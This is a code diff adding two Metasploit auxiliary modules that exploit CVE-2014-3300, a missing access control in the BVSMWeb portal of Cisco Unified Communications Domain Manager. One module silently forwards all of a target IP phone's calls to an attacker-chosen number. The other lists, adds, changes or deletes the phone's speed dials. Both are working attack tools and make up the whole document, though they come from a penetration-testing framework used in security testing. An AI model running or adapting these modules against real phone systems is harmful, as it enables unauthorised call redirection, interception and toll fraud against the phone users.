Test landing #4065 into up to date branch

modules/auxiliary/voip/cisco_cucdm_callforward.rb

@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'rexml/document'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+        'Name'        => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
+        'Description' => %q{
+          The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
+          in Unified CDM Application Software before 10 does not properly implement access control,
+          which allows remote attackers to modify user information. This vulnerability can be exploited
+          for unauthorised call forwarding using this module. This tool can be tested with the fake
+          voss-xmlservice component of Viproy.
+        },
+        'Author'      => 'fozavci',
+        'References'  =>
+            [
+                ['CVE', '2014-3300'],
+                ['BID', '68331'],
+                ['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
+            ],
+        'License'     => MSF_LICENSE,
+        'Actions'     =>
+            [
+                [ 'Forward', {
+                    'Description' => 'Enabling the call forwarding for the MAC address.'
+                } ],
+                [ 'Info', {
+                    'Description' => 'Retrieving the call forwarding information for the MAC address.'
+                } ]
+            ],
+        'DefaultAction'  => 'Info'
+
+    )
+
+    register_options(
+        [
+            OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
+            OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
+            OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
+            OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines', '']),
+        ], self.class)
+  end
+
+  def run
+    uri = normalize_uri(target_uri.to_s)
+    mac = Rex::Text.uri_encode(datastore["MAC"])
+    forward_to = Rex::Text.uri_encode(datastore["FORWARDTO"])
+
+
+    print_status("Getting fintnumbers and display names of the IP phone")
+
+    uri_show=normalize_uri(uri+"/showcallfwd.cgi?device=SEP#{mac}")
+    vprint_status("URL: "+uri_show)
+
+    res = send_request_cgi(
+      {
+        'uri'    => uri_show,
+        'method' => 'GET',
+      })
+
+    if res and res.code == 200 and res.body =~ /fintnumber/
+      doc = REXML::Document.new(res.body)
+      lines=[]
+      fintnumbers=[]
+
+      list=doc.root.get_elements("MenuItem")
+      list.each {|lst|
+        xlist=lst.get_elements("Name")
+        xlist.each {|l| lines << "#{l[0]}"}
+        xlist=lst.get_elements("URL")
+        xlist.each {|l| fintnumbers << "#{l[0].to_s.split("fintnumber=")[1]}" }
+      }
+      lines.size.times{|i| print_status("Display Name: "+lines[i]+"\t"+"Fintnumber: "+fintnumbers[i])}
+
+      # for a specific FINTNUMBER redirection
+      fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]]
+
+      if action.name.upcase == "FORWARD"
+        fintnumbers.each {|fintnumber|
+
+        print_status("Sending call forward request for #{fintnumber}")
+
+        uri_fwd=normalize_uri(uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forward_to}")
+        vprint_status("URL: "+uri_fwd)
+        res = send_request_cgi(
+            {
+                'uri'    => uri_fwd,
+                'method' => 'GET',
+            })
+
+        uri_fwdpln=normalize_uri(uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}")
+        vprint_status("URL: "+uri_fwdpln)
+        res = send_request_cgi(
+            {
+                'uri'    => uri_fwdpln,
+                'method' => 'GET',
+            })
+
+        if res and res.body and res.body.to_s =~ /CFA/
+          print_good("Call forwarded successfully for #{fintnumber}")
+        else
+          print_status("Call forward failed.")
+        end
+        }
+      end
+    else
+      print_error("Target appears not vulnerable!")
+    end
+  end
+end

modules/auxiliary/voip/cisco_cucdm_speeddials.rb

@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      'Name'        => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
+      'Description' => %q{
+        The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
+        in Unified CDM Application Software before 10 does not properly implement access control,
+        which allows remote attackers to modify user information. This vulnerability can be exploited
+        for unauthorised speeddial manipulation using this module. This tool can be tested with the fake
+        voss-xmlservice component of Viproy.
+      },
+      'Author'      => 'fozavci',
+      'References'     =>
+          [
+              ['CVE', '2014-3300'],
+              ['BID', '68331'],
+              ['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
+          ],
+      'License'     => MSF_LICENSE,
+      'Actions'     =>
+          [
+              [ 'List', {
+                  'Description' => 'Getting the speeddials for the MAC address.'
+              } ],
+              [ 'Modify', {
+                  'Description' => 'Modifying a speeddial for the MAC address.'
+              } ],
+              [ 'Add', {
+                  'Description' => 'Adding a speeddial for the MAC address.'
+              } ],
+              [ 'Delete', {
+                  'Description' => 'Deleting a speeddial for the MAC address.'
+              } ]
+          ],
+      'DefaultAction'  => 'List'
+    )
+
+    register_options(
+    [
+      Opt::RPORT(80),
+      OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
+      OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
+      OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
+      OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
+      OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
+    ], self.class)
+  end
+
+  def run
+    uri = normalize_uri(target_uri.to_s)
+    mac = Rex::Text.uri_encode(datastore["MAC"])
+    name = Rex::Text.uri_encode(datastore["NAME"])
+    position = Rex::Text.uri_encode(datastore["POSITION"])
+    telno = Rex::Text.uri_encode(datastore["TELNO"])
+
+
+    case action.name.upcase
+      when 'MODIFY'
+        print_status("Deleting Speed Dial of the IP phone")
+        url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
+        vprint_status("URL: "+url)
+        status,res=send_rcv(url)
+        if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
+          print_good("Speed Dial #{position} is deleted successfully")
+          print_status("Adding Speed Dial to the IP phone")
+          url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
+          vprint_status("URL: "+url)
+          status,res=send_rcv(url)
+          if status != Exploit::CheckCode::Safe and res.body =~ /Added/
+            print_good("Speed Dial #{position} is added successfully")
+          elsif res.body =~ /exist/
+            print_error("Speed Dial is exist, change the position or choose modify!")
+          else
+            print_error("Speed Dial couldn't add!")
+          end
+        else
+          print_error("Speed Dial is not found!")
+        end
+      when 'DELETE'
+        print_status("Deleting Speed Dial of the IP phone")
+        url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
+        vprint_status("URL: "+url)
+        status,res=send_rcv(url)
+        if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
+          print_good("Speed Dial #{position} is deleted successfully")
+        else
+          print_error("Speed Dial is not found!")
+        end
+      when 'ADD'
+        print_status("Adding Speed Dial to the IP phone")
+        url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
+        vprint_status("URL: "+url)
+        status,res=send_rcv(url)
+        if status != Exploit::CheckCode::Safe and res.body =~ /Added/
+          print_good("Speed Dial #{position} is added successfully")
+        elsif res.body =~ /exist/
+          print_error("Speed Dial is exist, change the position or choose modify!")
+        else
+          print_error("Speed Dial couldn't add!")
+        end
+    else
+      print_status("Getting Speed Dials of the IP phone")
+      url=uri+"/speeddials.cgi?device=SEP#{mac}"
+      vprint_status("URL: "+url)
+
+      status,res=send_rcv(url)
+      parse(res) if status != Exploit::CheckCode::Safe
+    end
+
+  end
+
+  def send_rcv(uri)
+    uri=normalize_uri(uri.to_s)
+    res = send_request_cgi(
+        {
+            'uri'    => uri,
+            'method' => 'GET',
+        })
+    if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
+      return Exploit::CheckCode::Vulnerable,res
+    else
+      print_error("Target appears not vulnerable!")
+      return Exploit::CheckCode::Safe,res
+    end
+  end
+
+  def parse(res)
+    doc = REXML::Document.new(res.body)
+    names=[]
+    phones=[]
+
+    list=doc.root.get_elements("DirectoryEntry")
+    list.each {|lst|
+      xlist=lst.get_elements("Name")
+      xlist.each {|l| names << "#{l[0]}"}
+      xlist=lst.get_elements("Telephone")
+      xlist.each {|l| phones << "#{l[0]}" }
+    }
+    if names.size > 0
+      names.size.times{|i| print_good("Position: "+names[i].split(":")[0]+"\tName: "+names[i].split(":")[1]+"\t"+"Telephone: "+phones[i])}
+    else
+      print_status("No Speed Dial detected")
+    end
+  end
+end